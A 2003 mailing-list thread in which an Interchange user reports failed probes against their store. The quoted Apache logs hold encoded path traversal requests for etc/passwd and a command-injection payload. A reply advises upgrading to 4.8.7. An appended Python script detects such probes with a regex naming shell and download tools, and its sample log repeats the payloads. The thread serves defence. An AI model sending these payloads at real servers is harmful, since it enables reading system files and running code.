[ic] Hack attempt on IC 4.8.6

Ed LaFrance edl at newmediaems.com
Sat Nov 15 09:18:07 EST 2003


At 10:35 PM 11/14/2003 -0800, you wrote:
> From what I can tell this person was unsuccessful.  My IC and Apache 
> logs show multiple attempts to grab my passwd file by inserting many 
> ../../../../../'s in the URLs and attempts to execute arbitrary perl code 
> by manipulating URL parameters.  Here are a few lines:
>
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00 HTTP/1.0" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id= HTTP/1.0" 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id= HTTP/1.0" 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice HTTP/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>
>Sorry for the weird wrapping.  The log goes on and on like this.
>
>Has anyone else seen this kind of attempt?  It looks like a script judging 
>by the rapidity of the accesses.
>
>Ryan

I just grepped the logs on a couple of servers for matching substrings and 
came up empty. I get the impression that this attempt was targeted 
specifically at Interchange. There was a vulnerability in the 4.8 branch 
which could allow arbitrary file reads with a technique like this, but it 
was fixed, so if you are running 4.8.7 or higher you should be OK. If you 
are running an earlier version, I strongly recommend an upgrade.

- Ed


===============================================================
New Media E.M.S.              Technology Solutions for Business
11630 Fair Oaks Blvd., #250   eCommerce | Consulting | Hosting
Fair Oaks, CA  95628          edl at newmediaems.com
(916) 961-0446                http://www.newmediaems.com
(866) 519-4680 Toll-Free      (916) 961-0447 Fax
=============================================================== 
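The log lines quoted above show three things worth triaging for on any server that fronts a CGI or mod_perl application: repeated ../ sequences aimed at etc/passwd, a trailing %00 (a NUL byte, used to cut a path off at the attacker's chosen point before any suffix the application appends), and a shell metacharacter followed by "perl -e". The script below is an added example, not code from Interchange or from either poster: it parses Apache combined-format lines, URL-decodes each query parameter (repeatedly, so double-encoded %252e probes are caught too), and tags each request with the categories it exhibits. The sample log is constructed, shortened from the lines in the post; the regexes and function names are assumptions of this example, not anything Interchange ships.

```python
"""Triage Apache access-log lines for traversal, NUL-byte and command-injection probes.

Added example, not code from Interchange or from the original message. The
sample log below is constructed (shortened versions of the lines in the post).
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format up to the status and size fields; referer and agent
# are left unparsed because the checks here only need the request target.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# A shell metacharacter followed by an interpreter or download tool, e.g. "|perl -e".
INTERP_RE = re.compile(r'[;|&`]\s*(?:perl|sh|bash|python|nc|wget|curl)\b', re.I)

# Constructed sample input (shortened from the lines quoted in the post).
SAMPLE_LOG = """\
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0"
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%7cperl%20%2de%20%27print%22roo%22%27%26%26foo%00 HTTP/1.0" 403 82 "-" "Mozilla/4.0"
66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id= HTTP/1.0" 200 8162 "-" "Mozilla/4.0"
66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R&mv_pc=1&spg=customerservice HTTP/1.0" 302 39 "-" "Mozilla/4.0"
"""


def full_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded probes (%252e) are caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(value: str) -> List[str]:
    """Return the probe categories present in one parameter value (may be empty)."""
    decoded = full_decode(value)
    findings = []
    if "\x00" in decoded:
        findings.append("null-byte")
    if "../" in decoded or "..\\" in decoded:
        findings.append("traversal")
    if INTERP_RE.search(decoded):
        findings.append("command-injection")
    return findings


def scan_line(line: str) -> Optional[Dict]:
    """Parse one log line; return a finding dict if any parameter looks hostile."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    hits = {}
    # parse_qsl already decodes one layer; full_decode inside classify_param
    # handles values that were encoded more than once.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        tags = classify_param(value)
        if tags:
            hits[name] = tags
    if not hits:
        return None
    return {
        "host": m["host"],
        "time": m["time"],
        "path": parts.path,
        "status": int(m["status"]),
        "params": hits,
    }


def scan_log(text: str) -> List[Dict]:
    """Scan every line; results keep log order so a burst from one host stands out."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


def hosts_to_review(findings: List[Dict]) -> Dict[str, int]:
    """Count flagged requests per client IP; many hits within a second is a scanner."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return counts


if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    for f in findings:
        # The status is only a hint about which layer answered; a flagged
        # request that got a 200 deserves a closer look than one that got a 403.
        print(f"{f['host']} {f['time']} {f['path']} -> {f['status']} {f['params']}")
    print(hosts_to_review(findings))
```

Run it against a real access_log with scan_log(open(path).read()) and look first at flagged requests whose status is 200: a 403 from Apache or a redirect from the application is what the post shows, but the script does not know whether the application read the parameter before answering, so log triage tells you the scope of the probing, not whether it succeeded. The upgrade to 4.8.7 or later that Ed recommends is the actual fix.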



More information about the interchange-users mailing list